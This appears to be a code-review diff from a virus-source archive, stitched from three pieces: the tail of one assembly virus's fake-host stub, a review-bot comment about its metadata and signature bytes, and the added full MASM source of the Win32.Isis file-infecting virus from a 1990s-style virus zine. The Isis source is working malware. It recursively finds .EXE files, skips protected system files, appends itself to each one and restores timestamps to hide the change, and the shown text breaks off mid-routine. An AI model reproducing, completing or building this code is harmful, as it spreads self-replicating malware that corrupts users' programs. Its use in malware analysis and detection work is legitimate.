db 13, 10, "(c)oded by shitdown in jul-2000, http://shitdown@sf.cz, shitdown@sf.cz", 13, 10
db "welcome to first generation!", 13, 10
msg_len = $-msg
db 1024 dup(?)
fake_host:
;--------------- same kernel scanner
pop eax ;kernel address to eax
push eax
xor ax, ax
_k32_scan_next:
push eax ;for restorin' by seh
call _set_k32_scan_seh
_k32_scan_seh:
pop ecx ;esp+8
pop ecx
pop esp ;mov esp, [esp+8]
_k32_scan_mismatch:
pop eax ;restore last kernel address
pop ecx ;remove old seh
pop ecx
add eax, 0-10000h
jmp short _k32_scan_next ;try again
_set_k32_scan_seh:
push eax
xor ecx, ecx
mov dword ptr fs:[ecx], esp
cmp word ptr [eax], 5a4dh
jne _k32_scan_mismatch
_k32_found:
pop ebp ;eax
pop eax ;remove old seh
pop eax
;-----------------------------------
xor ecx, ecx
push offset exception_handler
push ecx
mov dword ptr fs:[0], esp
push -11 ;get a standard handle
api <getstdhandle>
push 0
push offset dummy
push msg_len
push offset msg
push eax
api <writefile>
push 0
api <exitprocess>
end go
;heh, thats all
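Review bot: The banner metadata in this file disagrees with the code it describes: the header gives `size : 540 bytes` and a date of feb-18-2001, while the fake-host text prints digits computed from `virus_size` and says `jul-2000`, and its URL `http://shitdown@sf.cz` is malformed next to the `http://shitdown.sf.cz` form used in the header. Since `virus_size = $-virus_start` is assembler-derived, the header's fixed byte count should either reference that symbol or be dropped so the two cannot drift. For anyone using this archive for detection work, note that `msg` and the `win32.infancy.` / `welcome to first generation!` strings are placed after `virus_end:` in the fake-host part, so they are outside the span between `virus_start:` and `virus_end:` that the `rep movsb` copies and would not be present in a file carrying this code; the header's `strings : no` presumably refers to that span, and a comment stating this next to `msg:` would save a reader from building a signature on the wrong bytes.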
+964
@@ -0,0 +1,964 @@
COMMENT ` ---------------------------------------------------------------- )=-
-=( Natural Selection Issue #1 -------------------------------- Win32.Isis )=-
-=( ---------------------------------------------------------------------- )=-
-=( 0 : Win32.Isis Features ---------------------------------------------- )=-
Imports: Copies LoadLibraryA and GetProcAddress from hosts [it will
only infect files that already Import both]
Infects: PE files with an .EXE extension by expanding the last
section, but without setting the write bit
Strategy: With a fully recursive directory scanning engine that
doesn't enter directories more than once per run
Compatibility: 95/98/ME/NT/2000 Compatible, avoids Win2K SFC'd files
Saves Stamps: Yes
MultiThreaded: No
Polymorphism: None
AntiAV / EPO: None
SEH Abilities: None
Payload: Displays a MessageBoxA
-=( 1 : Win32.Isis Design Goals ------------------------------------------ )=-
: To test an implementation of MASMs type checking on API and PROC calls.
: To place all virus data into one structure that can be stack hosted, so the
write bit does not need to be set in infected sections.
: To serve as a test virus for a fast, recursive directory scanner, which does
not visit the same directory twice, and uses only stack data.
: To use Imports through GetProcAddress/LoadLibraryA, which are stolen in
hosts that already import them.
When it was finished, a friend's pet rat had died, her name was Isis, and so
the virus was named in its memory. Besides it's a nice virus name too.
-=( 2 : Win32.Isis Design Faults ----------------------------------------- )=-
While it did achieve all of the design goals, its structure really needs a lot
of work, especially to clean up the data tables. When infecting some PE
files, headers and sections can be incorrectly calculated [rarely], so that
would also need to be modified. Finally, a lot of the variables are badly
named.
-=( 3 : Win32.Isis Disclaimer -------------------------------------------- )=-
THE CONTENTS OF THIS ELECTRONIC MAGAZINE AND ITS ASSOCIATED SOURCE CODE ARE
COVERED UNDER THE BELOW TERMS AND CONDITIONS. IF YOU DO NOT AGREE TO BE BOUND
BY THESE TERMS AND CONDITIONS, OR ARE NOT LEGALLY ENTITLED TO AGREE TO THEM,
YOU MUST DISCONTINUE USE OF THIS MAGAZINE IMMEDIATELY.
COPYRIGHT
Copyright on materials in this magazine and the information therein and
their arrangement is owned by FEATHERED SERPENTS unless otherwise indicated.
RIGHTS AND LIMITATIONS
You have the right to use, copy and distribute the material in this
magazine free of charge, for all purposes allowed by your governing
laws. You are expressly PROHIBITED from using the material contained
herein for any purposes that would cause or would help promote
the illegal use of the material.
NO WARRANTY
The information contained within this magazine are provided "as is".
FEATHERED SERPENTS do not warranty the accuracy, adequacy,
or completeness of given information, and expressly disclaims
liability for errors or omissions contained therein. No implied,
express, or statutory warranty, is given in conjunction with this magazine.
LIMITATION OF LIABILITY
In *NO* event will FEATHERED SERPENTS or any of its MEMBERS be liable for any
damages including and without limitation, direct or indirect, special,
incidental, or consequential damages, losses, or expenses arising in
connection with this magazine, or the use thereof.
ADDITIONAL DISCLAIMER
Computer viruses will spread of their own accord between computer systems, and
across international boundaries. They are raw animals with no concern for the
law, and for that reason your possession of them makes YOU responsible for the
actions they carry out.
The viruses provided in this magazine are for educational purposes ONLY. They
are NOT intended for use in ANY WAY outside of strict, controlled laboratory
conditions. If compiled and executed these viruses WILL land you in court(s).
You will be held responsible for your actions. As source code these viruses
are inert and covered by implied freedom of speech laws in some
countries. In binary form these viruses are malicious weapons. FEATHERED
SERPENTS do not condone the application of these viruses and will NOT be held
LIABLE for any MISUSE.
-=( 4 : Win32.Isis Compile Instructions ---------------------------------- )=-
MASM 6.15 and LINK 6.00.8447
ml /c /Cp /coff /Fl /Zi Isis.asm
link /debug /debugtype:cv /subsystem:windows Isis.obj
-=( 5 : Win32.Isis ------------------------------------------------------- ) `
.386p ; 386 opcodes
.model flat,stdcall ; Written for flat Win32
option casemap:none ; Use mixed case symbols
include masmwinc.inc ; Win32 constant symbols
includelib c:\masm32\lib\kernel32.lib ; First-run imported API
ExitProcess PROTO :DWORD
LoadLibraryA PROTO :DWORD
GetProcAddress PROTO :DWORD, :DWORD
Host SEGMENT 'CODE'
push 0
call ExitProcess
call LoadLibraryA
call GetProcAddress
Host ENDS
; =============================================================================
; ( Virus Constants, Protos, and Macros ) =====================================
; =============================================================================
FRUN_HOSTSRVA EQU 3000H
FRUN_VIRUSRVA EQU 5000H
FRUN_LOADLIBRARYA EQU 9060H
FRUN_GETPROCADDRESS EQU 9064H
GAME_OVER_MAX EQU 6
AVOIDED_FILES EQU FILE_ATTRIBUTE_DEVICE OR FILE_ATTRIBUTE_TEMPORARY OR \
FILE_ATTRIBUTE_SPARSE_FILE OR FILE_ATTRIBUTE_REPARSE_POINT OR \
FILE_ATTRIBUTE_OFFLINE OR FILE_ATTRIBUTE_COMPRESSED OR \
FILE_ATTRIBUTE_ENCRYPTED
DO_API MACRO PARAM:VARARG
PUSHAD
INVOKE PARAM
MOV [ESP+1CH], EAX
POPAD
ENDM DO_API
CompareStringM MACRO STRING1:REQ, STRING2:REQ
DO_API tCompareStringA PTR [esi + VX.pCompareStringA], \
LOCALE_SYSTEM_DEFAULT, NORM_IGNORECASE, STRING1, -1, \
STRING2, -1
ENDM CompareStringM
CreateFileM MACRO FILENAME:REQ
DO_API tCreateFileA PTR [esi + VX.pCreateFileA], FILENAME, \
GENERIC_READ OR GENERIC_WRITE, 0, 0, OPEN_EXISTING, \
0, 0
ENDM CreateFileM
CreateFileMappingM MACRO HANDLE:REQ, SIZE:REQ
DO_API tCreateFileMappingA PTR [esi + VX.pCreateFileMappingA], \
HANDLE, 0, PAGE_READWRITE, 0, SIZE, 0
ENDM CreateFileMappingM
ListEntry MACRO POINTER: REQ, STRING:REQ, TYPE:VARARG
p&POINTER DD 0
s&POINTER DB STRING, 0
TYPE
ENDM ListEntry
MapViewOfFileM MACRO HANDLE:REQ
DO_API tMapViewOfFile PTR [esi + VX.pMapViewOfFile], HANDLE, \
FILE_MAP_ALL_ACCESS, NULL, NULL, NULL
ENDM MapViewOfFileM
VirusEntry PROTO
Recurse PROTO VD:PTR VX, RL:PTR RX
AccessFile PROTO VD:PTR VX, RD:PTR RX
PrepareFile PROTO VD:PTR VX, RD:PTR RX, MAP:DWORD
ImportScan PROTO VD:PTR VX, MAP:DWORD, TABLE:DWORD
FinishFile PROTO VD:PTR VX, RD:PTR RX, MAP:DWORD
AlignToVA PROTO VALUE:DWORD, ALIGNER:DWORD
ConvertToVA PROTO MAP:DWORD, VALUE:DWORD
___SfcIsFileProtected PROTO A:DWORD, B:DWORD
___CheckSumMappedFile PROTO A:DWORD, B:DWORD, Y:DWORD, Z:DWORD
; =============================================================================
; ( Virus Structures ) ========================================================
; =============================================================================
VX STRUCT DWORD
VirusEntryPoint DD FRUN_VIRUSRVA
HostsEntryPoint DD FRUN_HOSTSRVA
LoadLibraryRVA DD FRUN_LOADLIBRARYA
GetProcAddressRVA DD FRUN_GETPROCADDRESS
DeltaOffset DD 0
GameOverMan DD 0
FindSpecification DB '*', 0
ExecSpecification DB '.EXE', 0
SectionEntry DD 0
NewFileSize DD 0
NewSectionSize DD 0
ImportList DD VX.pCloseHandle, VX.ImportKernel32, NULL
DD VX.pCompareStringA, VX.ImportKernel32, NULL
DD VX.pCreateFileA, VX.ImportKernel32, NULL
DD VX.pCreateFileMappingA, VX.ImportKernel32, NULL
DD VX.pFindClose, VX.ImportKernel32, NULL
DD VX.pFindFirstFileA, VX.ImportKernel32, NULL
DD VX.pFindNextFileA, VX.ImportKernel32, NULL
DD VX.pGetCurrentDirectoryA, VX.ImportKernel32, NULL
DD VX.pGetFileAttributesA, VX.ImportKernel32, NULL
DD VX.pGetLocalTime, VX.ImportKernel32, NULL
DD VX.pMapViewOfFile, VX.ImportKernel32, NULL
DD VX.pSetCurrentDirectoryA, VX.ImportKernel32, NULL
DD VX.pSetFileAttributesA, VX.ImportKernel32, NULL
DD VX.pSetFileTime, VX.ImportKernel32, NULL
DD VX.pUnmapViewOfFile, VX.ImportKernel32, NULL
DD VX.pMessageBoxA, VX.ImportUser32, NULL
DD VX.pCheckSumMappedFile, VX.ImportImageHlp, AlternSum - WinMain
DD VX.pSfcIsFileProtected, VX.ImportSfc, AlternSfc - WinMain
DD NULL
ImportKernel32 DB 'KERNEL32.DLL', 0
ListEntry CloseHandle, 'CloseHandle', tCloseHandle TYPEDEF PROTO :DWORD
ListEntry CompareStringA, 'CompareStringA', tCompareStringA TYPEDEF PROTO :DWORD,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD
ListEntry CreateFileA, 'CreateFileA', tCreateFileA TYPEDEF PROTO :DWORD,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD
ListEntry CreateFileMappingA, 'CreateFileMappingA', tCreateFileMappingA TYPEDEF PROTO :DWORD,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD
ListEntry FindClose, 'FindClose', tFindClose TYPEDEF PROTO :DWORD
ListEntry FindFirstFileA, 'FindFirstFileA', tFindFirstFileA TYPEDEF PROTO :DWORD,:DWORD
ListEntry FindNextFileA, 'FindNextFileA', tFindNextFileA TYPEDEF PROTO :DWORD,:DWORD
ListEntry GetCurrentDirectoryA, 'GetCurrentDirectoryA', tGetCurrentDirectoryA TYPEDEF PROTO :DWORD,:DWORD
ListEntry GetFileAttributesA, 'GetFileAttributesA', tGetFileAttributesA TYPEDEF PROTO :DWORD
ListEntry GetProcAddress, 'GetProcAddress', tGetProcAddress TYPEDEF PROTO :DWORD,:DWORD
ListEntry GetLocalTime, 'GetLocalTime', tGetLocalTime TYPEDEF PROTO :DWORD
ListEntry LoadLibraryA, 'LoadLibraryA', tLoadLibraryA TYPEDEF PROTO :DWORD
ListEntry MapViewOfFile, 'MapViewOfFile', tMapViewOfFile TYPEDEF PROTO :DWORD,:DWORD,:DWORD,:DWORD,:DWORD
ListEntry SetCurrentDirectoryA, 'SetCurrentDirectoryA', tSetCurrentDirectoryA TYPEDEF PROTO :DWORD
ListEntry SetFileAttributesA, 'SetFileAttributesA', tSetFileAttributesA TYPEDEF PROTO :DWORD,:DWORD
ListEntry SetFileTime, 'SetFileTime', tSetFileTime TYPEDEF PROTO :DWORD,:DWORD,:DWORD,:DWORD
ListEntry UnmapViewOfFile, 'UnmapViewOfFile', tUnmapViewOfFile TYPEDEF PROTO :DWORD
ImportUser32 DB 'USER32.DLL', 0
ListEntry MessageBoxA, 'MessageBoxA', tMessageBoxA TYPEDEF PROTO :DWORD,:DWORD,:DWORD,:DWORD
ImportImageHlp DB 'IMAGEHLP.DLL', 0
ListEntry CheckSumMappedFile, 'CheckSumMappedFile', tCheckSumMappedFile TYPEDEF PROTO :DWORD,:DWORD,:DWORD,:DWORD
ImportSfc DB 'SFC.DLL', 0
ListEntry SfcIsFileProtected, 'SfcIsFileProtected', tSfcIsFileProtected TYPEDEF PROTO :DWORD,:DWORD
VirusTitle DB 'Your Computer Flows With The Spyryt Of Win32.Isis', 0 ; Your Computer Flows With The Spyryt Of Win32.Isis
VirusMessage DB 'Dedicated to our Isis and Horus: Maman vous aime!', 13, 10 ; Dedicated to our Isis and Horus: Maman vous aime!
DB 13, 10 ;
DB 'Create', 9, 'PROTO Mother:PTR Rat, Father:PTR Rat', 13, 10 ; Create PROTO Mother:PTR Rat, Father:PTR Rat
DB 9, '...', 13, 10 ; ...
DB 'Rat', 9, 'STRUCT', 13, 10 ; Rat STRUCT
DB 9, 'Colour', 9, 'DB 10 DUP (?)', 13, 10 ; Colour DB 10 DUP (?)
DB 9, 'Length', 9, 'DD ?', 13, 10 ; Length DD ?
DB 'Rat', 9, 'ENDS', 13, 10 ; Rat ENDS
DB 9, '...', 13, 10 ; ...
DB 'Isis', 9, 'Rat {''Drk', 9, 'Blonde'', 9}', 9, '; Mother', 13, 10 ; Isis Rat {'Drk Blonde', 9} ; Mother
DB 'Horus', 9, 'Rat {''Ash', 9, 'Blonde'', 7}', 9, '; Father', 13, 10 ; Horus Rat {'Ash Blonde', 7} ; Father
DB 9, '...', 13, 10 ; ...
DB 9, 'INVOKE Create, ADDR Isis, ADDR Horus', 13, 10 ; INVOKE Create, ADDR Isis, ADDR Horus
DB 9, '...', 13, 10 ; ...
DB 'Create', 9, 'PROC', 9, 'USES', 9, 'EBX ECX EDX ESI EDI,', 13, 10 ; Create PROC USES EBX ECX EDX ESI EDI
DB 9, 9, 9, 'Mother:PTR Rat, Father:PTR Rat', 13, 10 ; Mother:PTR Rat, Father:PTR Rat
DB 9, 9, 'LOCAL', 9, 'Daughter:Rat', 13, 10 ; LOCAL Daughter:Rat
DB 13, 10 ;
DB 9, 'mov esi,', 9, '[Mother', 9, ']', 13, 10 ; mov esi, [Mother]
DB 9, 'mov esi,', 9, '[esi', 9, ']', 13, 10 ; mov esi, [esi]
DB 9, 'mov ebx,', 9, '[esi + Rat.Length', 9, ']', 13, 10 ; mov ebx, [esi + Rat.Length]
DB 9, 'mov edi,', 9, '[Father', 9, ']', 13, 10 ; mov edi, [Father]
DB 9, 'mov edi,', 9, '[edi', 9, ']', 13, 10 ; mov edi, [edi]
DB 9, 'add ebx,', 9, '[edi + Rat.Length', 9, ']', 13, 10 ; add ebx, [edi + Rat.Length]
DB 9, 'shr ebx,', 9, 9, '1', 13, 10 ; shr ebx, 1
DB 9, 'mov [Daughter.Length],', 9, 'ebx', 13, 10 ; mov [Daughter.Length], ebx
DB 9, '...', 13, 10 ; ...
DB 13, 10, 0 ;
ALIGN 4
VX ENDS
RX STRUCT DWORD
FindData WIN32_FIND_DATA {?}
FindHandle DD ?
NewDirectory DD MAX_PATH DUP (?)
CurrentDirectory DD MAX_PATH DUP (?)
LastRecurse DD ?
ALIGN 4
RX ENDS
; =============================================================================
; ( Virus EntryPoint ) ========================================================
; =============================================================================
Virus SEGMENT 'CODE'
WinMain:
push NULL ; Updated to become HostsEntryPoint later
VirusEntry PROC
LOCAL VD:VX
; Save the registers for our host, calculate WinMain VA and Delta Offset
pusha
pushfd
call @F
@@: pop esi
sub esi, 12h ; @B - WinMain
mov eax, esi
sub esi, offset WinMain
push esi
; Copy our data section into the allocated stack area. Must be / DWORD.
lea esi, [esi][Virus_Data]
lea edi, [VD]
mov ecx, Size VD / 4
cld
rep movsd
pop [VD.DeltaOffset ]
; ImageBase = WinMain VA - WinMain RVA. Convert critical API RVA to VA.
sub eax, [VD.VirusEntryPoint ]
push eax
add eax, [VD.LoadLibraryRVA ]
mov eax, [eax]
mov [VD.pLoadLibraryA], eax
pop eax
push eax
add eax, [VD.GetProcAddressRVA]
mov eax, [eax]
mov [VD.pGetProcAddress], eax
pop eax
; Overwrite the NULL we stored on the stack with our Hosts EntryPoint VA
add eax, [VD.HostsEntryPoint ]
mov [ebp + DWORD], eax
; Parse our ImportList. Formatted as: API RVA, DLL RVA, ALTERNATE RVA.
lea esi, [VD.ImportList]
@@: lodsd ; RVA of API DWORD
or eax, eax ; NULL if List End
jz @F ; Stop if it's the end of this List
lea edi, [eax][VD] ; EDI = Where to write final API VA
lea ebx, [eax][VD][4] ; API Name String follows API DWORD
lodsd ; DLL Name String RVA
DO_API tLoadLibraryA PTR [VD.pLoadLibraryA ], ADDR [VD][eax]
DO_API tGetProcAddress PTR [VD.pGetProcAddress], eax, ebx
stosd ; Save VA into API VA
or eax, eax ; Check if successful
lodsd ; Alternate Entry RVA
jnz @B ; Loop back if all OK
or eax, eax ; Check if Alternate doesn't exist
jz WinExit ; Abort, because we need something
add eax, offset WinMain
add eax, [VD.DeltaOffset]
mov [edi][-4], eax
jmp @B ; Save Alternates VA and loop back
@@: ; Initialize counter, recurse through directories for infectable files
mov [VD.GameOverMan], NULL
DO_API Recurse, ADDR [VD], NULL
; Check if the date is 21st of November which is when Isis passed away
DO_API tGetLocalTime PTR [VD.pGetLocalTime], ADDR [VD]
cmp WORD PTR [VD][2], 11
jne WinExit
cmp WORD PTR [VD][6], 20
jne WinExit
DO_API tMessageBoxA PTR [VD.pMessageBoxA], NULL, ADDR [VD.VirusMessage], ADDR [VD.VirusTitle], NULL
WinExit:
popfd
popa
ret
VirusEntry ENDP
; =============================================================================
; ( Directory/File Recursion ) ================================================
; =============================================================================
Recurse PROC VD:Ptr VX, RL:Ptr RX
LOCAL RD:RX
; Search for the first entry in our current directory
mov esi, [VD]
mov eax, [RL]
mov [RD.LastRecurse], eax
DO_API tFindFirstFileA PTR [esi][VX.pFindFirstFileA], ADDR [esi][VX.FindSpecification], ADDR [RD.FindData]
mov [RD.FindHandle], eax
cmp eax, INVALID_HANDLE_VALUE
je RecurseExit
RecurseOkay:
; Don't touch files or directories with these strange attributes set
test dword ptr [RD.FindData.FileAttributes], AVOIDED_FILES
jnz RecurseNext
; Split between file / directory routines
test dword ptr [RD.FindData.FileAttributes], FILE_ATTRIBUTE_DIRECTORY
jnz RecurseDirs
; Locate end of file name
lea edi, [RD.FindData.FileName ]
xor eax, eax
mov ecx, MAX_PATH
repnz scasb
jnz RecurseNext
sub edi, 5
; Compare extension with .EXE
lea eax, [esi][VX.ExecSpecification]
CompareStringM eax, edi
cmp eax, 2
jne RecurseNext
; Check if it's under SFC protection or if it's too big for us to handle
DO_API tSfcIsFileProtected PTR [esi][VX.pSfcIsFileProtected], NULL, ADDR [RD.FindData.FileName]
or eax, eax
jnz @F
cmp [RD.FindData.FileSizeHigh], 0
jne @F
DO_API AccessFile, [VD], ADDR [RD]
@@: jmp RecurseNext
RecurseDirs:
; Don't recurse if we've recursed enough. Save the current directory and
; change to the new one and save its full directory name as well.
cmp [esi][VX.GameOverMan], GAME_OVER_MAX
je RecurseNext
DO_API tGetCurrentDirectoryA PTR [esi][VX.pGetCurrentDirectoryA], MAX_PATH, ADDR [RD.CurrentDirectory ]
cmp eax, NULL
je RecurseNext
DO_API tSetCurrentDirectoryA PTR [esi][VX.pSetCurrentDirectoryA], ADDR [RD.FindData.FileName]
cmp eax, NULL
je RecurseNext
DO_API tGetCurrentDirectoryA PTR [esi][VX.pGetCurrentDirectoryA], MAX_PATH, ADDR [RD.NewDirectory ]
cmp eax, NULL
je RecurseNext
; Loop through each Recurse stack comparing New to Currents
lea ebx, [RD.NewDirectory ]
lea edi, [RD]
@@: lea ecx, [edi][RX.CurrentDirectory]
CompareStringM ecx, ebx
cmp eax, 2
je RecurseMatch
mov edi, [edi][RX.LastRecurse]
or edi, edi
jnz @B
inc [esi][VX.GameOverMan ]
DO_API Recurse, [VD], ADDR [RD]
dec [esi][VX.GameOverMan ]
RecurseMatch:
DO_API tSetCurrentDirectoryA PTR [esi][VX.pSetCurrentDirectoryA], ADDR [RD.CurrentDirectory]
RecurseNext:
; Abort if we've recursed and infected enough
cmp [esi][VX.GameOverMan], GAME_OVER_MAX
je RecurseCleanup
; Continue the search for files / directories
DO_API tFindNextFileA PTR [esi][VX.pFindNextFileA], [RD.FindHandle], ADDR [RD.FindData ]
or eax, eax
jne RecurseOkay
RecurseCleanup:
; Close our search handle and exit
DO_API tFindClose PTR [esi][VX.pFindClose], [RD.FindHandle]
RecurseExit:
ret
Recurse ENDP
; =============================================================================
; ( File Access Moderator ) ===================================================
; =============================================================================
AccessFile PROC VD:PTR VX, RD:PTR RX
; Remove attributes only if necessary
mov esi, [VD]
mov edi, [RD]
test [esi][RX.FindData.FileAttributes], FILE_ATTRIBUTE_READONLY OR FILE_ATTRIBUTE_SYSTEM
jz @F
DO_API tSetFileAttributesA PTR [esi][VX.pSetFileAttributesA], ADDR [edi][RX.FindData.FileName], FILE_ATTRIBUTE_NORMAL
or eax, eax
jz AccessExit
@@: ; Open the file fully, saving each handle on the stack as we go
CreateFileM ADDR [edi][RX.FindData.FileName]
cmp eax, INVALID_HANDLE_VALUE
je AccessAttributes
push eax
push eax
CreateFileMappingM eax, 0
or eax, eax
jz AccessCloseFile
push eax
MapViewOfFileM eax
cmp eax, INVALID_HANDLE_VALUE
jz AccessCloseMap
push eax
; Prepare the file for infection by making sure headers are correct,
; working out how much space we will add to the file sections, etc
DO_API PrepareFile, [VD], [RD], eax
or eax, eax
jz AccessCloseView
; Close the file and reopen it bigger to fit the virus inside
pop eax
DO_API tUnmapViewOfFile PTR [esi][VX.pUnmapViewOfFile], eax
pop eax
DO_API tCloseHandle PTR [esi][VX.pCloseHandle], eax
pop eax
push eax
CreateFileMappingM eax, [esi][VX.NewFileSize]
or eax, eax
jz AccessCloseFile
push eax
MapViewOfFileM eax
cmp eax, INVALID_HANDLE_VALUE
jz AccessCloseMap
push eax
; Finish up infecting the file and increment infection counter
DO_API FinishFile, [VD], [RD], eax
or eax, eax
jz AccessCloseView
inc [esi][VX.GameOverMan ]
AccessCloseView:
pop eax
DO_API tUnmapViewOfFile PTR [esi][VX.pUnmapViewOfFile], eax
AccessCloseMap:
pop eax
DO_API tCloseHandle PTR [esi][VX.pCloseHandle], eax
AccessCloseFile:
; Reset file stamps so that we don't look too suspicious
pop ebx
DO_API tSetFileTime PTR [esi][VX.pSetFileTime], ebx, ADDR [edi][RX.FindData.LastWriteTime], ADDR [edi][RX.FindData.LastAccessTime], ADDR [edi][RX.FindData.CreationTime]
pop eax
DO_API tCloseHandle PTR [esi][VX.pCloseHandle], eax
AccessAttributes:
; Restore attributes only if they were changed
test [esi][RX.FindData.FileAttributes], FILE_ATTRIBUTE_READONLY OR \
FILE_ATTRIBUTE_SYSTEM
jz AccessExit
DO_API tSetFileAttributesA PTR [esi][VX.pSetFileAttributesA], ADDR [edi][RX.FindData.FileName], [edi][RX.FindData.FileAttributes]
AccessExit:
ret
AccessFile ENDP
; =============================================================================
; ( Infection Preparation ) ===================================================
; =============================================================================
PrepareFile PROC VD:PTR VX, RD:PTR RX, MAP:DWORD
; Is the file already infected?
mov esi, [VD ]
mov edi, [MAP]
cmp [edi][IMAGE_DOS_HEADER.e_csum], -1
je PrepareFail
cmp [edi][IMAGE_DOS_HEADER.e_magic], IMAGE_DOS_SIGNATURE
jne PrepareFail
; Are the standard COFF headers okay?
add edi, [edi][IMAGE_DOS_HEADER.e_lfanew]
cmp [edi][PE.Signature], IMAGE_NT_SIGNATURE
jne PrepareFail
cmp [edi][PE.Machine], IMAGE_FILE_MACHINE_I386
jne PrepareFail
cmp [edi][PE.SizeOfOptionalHeader], IMAGE_SIZEOF_NT_OPTIONAL32_HEADER
jne PrepareFail
cmp [edi][PE.Magic], IMAGE_NT_OPTIONAL_HDR32_MAGIC
jne PrepareFail
cmp [edi][PE.SizeOfHeaders], 0
je PrepareFail
; Do some checks on the Import Table
cmp [edi][PE.NumberOfRvaAndSizes], 2
jb PrepareFail
cmp [edi][PE.DataDirectory.Import.Sizes], 0
je PrepareFail
DO_API ConvertToVA, [MAP], [edi][PE.DataDirectory.Import.RVA]
mov edx, eax
or edx, edx
jz PrepareFail
; Loop through each IMPORT Entry looking for a 'Kernel32.DLL' Name. For
; each found we ImportScan for our LoadLibraryA and GetProcAddress. We
; can get both from the one IMPORT Entry, or if only one is found, then
; we continue scanning incase there are multiple 'Kernel32.DLL', IMPORT
; entries with procedures split across them.
mov ecx, [edi][PE.DataDirectory.Import.Sizes]
mov [esi][VX.LoadLibraryRVA], 0
mov [esi][VX.GetProcAddressRVA], 0
@@: DO_API ConvertToVA, [MAP], [edx][IMPORT.Names ]
or eax, eax
jz PrepareFail
lea ebx, [esi][VX.ImportKernel32]
CompareStringM eax, ebx
cmp eax, 2
jne PrepareNext
DO_API ImportScan, [VD], [MAP], edx
or eax, eax
jnz @F
PrepareNext:
add edx, SIZE IMPORT
sub ecx, SIZE IMPORT
jz PrepareFail
cmp ecx, [edi][PE.DataDirectory.Import.Sizes]
jae PrepareFail
jmp @B
@@: ; Scan through the SECTION Table and find the last 'Physical' SECTION. We
; save its RVA because its VA won't be valid when FinalFile needs it.
movzx ecx, [edi][PE.NumberOfSections ]
add di, [edi][PE.SizeOfOptionalHeader ]
adc edi, PE.Magic
xor eax, eax
PrepareSection:
; Also check there are no 'bad' entries
cmp [edi][SECTION.VirtualSize], 0
je PrepareFail
cmp [edi][SECTION.SizeOfRawData], 0
je PrepareFail
cmp [edi][SECTION.PointerToRawData], eax
jb @F
mov eax, [edi][SECTION.PointerToRawData]
mov edx, edi
@@: add edi, SIZE SECTION
loop PrepareSection
mov edi, edx
sub edx, [MAP]
mov [esi][VX.SectionEntry], edx
; Calculate how big the SECTION will be to completely engulf the rest of
; the file [including DEBUG information] and save as VirusEntryPoint
mov edx, [RD]
mov eax, [edx][RX.FindData.FileSizeLow ]
sub eax, [edi][SECTION.PointerToRawData]
push eax
add eax, [edi][SECTION.VirtualAddress ]
mov [esi][VX.VirusEntryPoint], eax
pop eax
; Calculate the SECTION + Slack + Virus + Padding Size
mov edx, [MAP]
add edx, [edx][IMAGE_DOS_HEADER.e_lfanew ]
add eax, Virus_Size
DO_API AlignToVA, eax, [edx][PE.FileAlignment]
mov [esi + VX.NewSectionSize], eax
add eax, [edi][SECTION.PointerToRawData ]
jc PrepareFail
mov [esi][VX.NewFileSize], eax
mov eax, -1
jmp PrepareExit
PrepareFail:
xor eax, eax
PrepareExit:
ret
PrepareFile ENDP
; =============================================================================
; ( Infection Import Scanner ) ================================================
; =============================================================================
ImportScan PROC VD:PTR VX, MAP:DWORD, TABLE:DWORD
; Locate the correct Thunk List which is swapped between MASM and TASM
mov esi, [VD]
mov edi, [TABLE]
mov eax, [edi][IMPORT.OriginalFirstThunk]
or eax, eax
jnz @F
mov eax, [edi][IMPORT.FirstThunk ]
@@: DO_API ConvertToVA, [MAP], eax
or eax, eax
jz ImportExit
mov edi, eax
xor ecx, ecx
; Check if entry is the last in the table. If not, skip it if it's an
; Ordinal entry, or load up where it points to and skip the Hint.
ImportLoop:
mov eax, [edi]
or eax, eax
jz ImportFinish
js ImportNext
DO_API ConvertToVA, [MAP], eax
or eax, eax
jz ImportFail
inc eax
inc eax
; Compare the string to our GetProcAddress string. If it matches, we
; move onto the 'save' section which is pointed to by EDX. We saved
; EAX for our next compare.
push eax
lea edx, [esi][VX.GetProcAddressRVA ]
CompareStringM ADDR [esi][VX.sGetProcAddress ], eax
cmp eax, 2
pop eax
je @F
; Compare the string to our LoadLibraryA string. If it matches, we
; move onto the 'save' section which is pointed to by EDX. We didn't
; save EAX, it's not needed anymore.
lea edx, [esi][VX.LoadLibraryRVA ]
CompareStringM ADDR [esi][VX.sLoadLibraryA ], eax
cmp eax, 2
jne ImportNext
@@: ; FirstThunk is the one that will be overwritten with the VAs of API on
; execution, wether linked with MASM or TASM. Save its RVA for later.
mov ebx, [TABLE ]
mov ebx, [ebx][IMPORT.FirstThunk]
lea ebx, [ebx + ecx * 4 ]
mov [edx], ebx
ImportNext:
inc ecx
add edi, 4
jmp ImportLoop
ImportFinish:
; Failed by default, meaning continue searching for more Kernel32.DLL
; Imports. If both API have been filled in, the loop routine that has
; called us can stop searching.
mov eax, -1
cmp [esi][VX.LoadLibraryRVA], 0
je ImportFail
cmp [esi][VX.GetProcAddressRVA], 0
jne ImportExit
ImportFail:
xor eax, eax
ImportExit:
ret
ImportScan ENDP
; =============================================================================
; ( Infection Finishing ) =====================================================
; =============================================================================
FinishFile PROC VD:PTR VX, RD:PTR RX, MAP:DWORD
; Set our infection marker
mov esi, [VD ]
mov edi, [MAP]
mov [edi][IMAGE_DOS_HEADER.e_csum], -1
; ESI = VD, EDI = PE, EDX = SECTION
mov edx, [esi][VX.SectionEntry ]
lea edx, [edi][edx ]
add edi, [edi][IMAGE_DOS_HEADER.e_lfanew]
push edi
; Write all new SECTION fields
mov eax, [edx][SECTION.VirtualSize ]
cmp eax, [edx][SECTION.SizeOfRawData ]
ja @F
mov eax, [edx][SECTION.SizeOfRawData ]
@@: DO_API AlignToVA, eax, [edi][PE.SectionAlignment ]
sub [edi][PE.SizeOfImage], eax
DO_API AlignToVA, [esi][VX.NewSectionSize], [edi][PE.SectionAlignment]
add [edi][PE.SizeOfImage], eax
mov ebx, [esi][VX.NewSectionSize]
mov [edx][SECTION.VirtualSize ], ebx
mov [edx][SECTION.SizeOfRawData ], ebx
or [edx][SECTION.Characteristics], IMAGE_SCN_MEM_READ
; Decide what SizeOfX SECTION we're in, subtract and update
mov eax, [edx][SECTION.VirtualSize ]
cmp eax, [edx][SECTION.SizeOfRawData ]
ja @F
mov eax, [edx][SECTION.SizeOfRawData ]
@@: lea ecx, [edi][PE.SizeOfCode ]
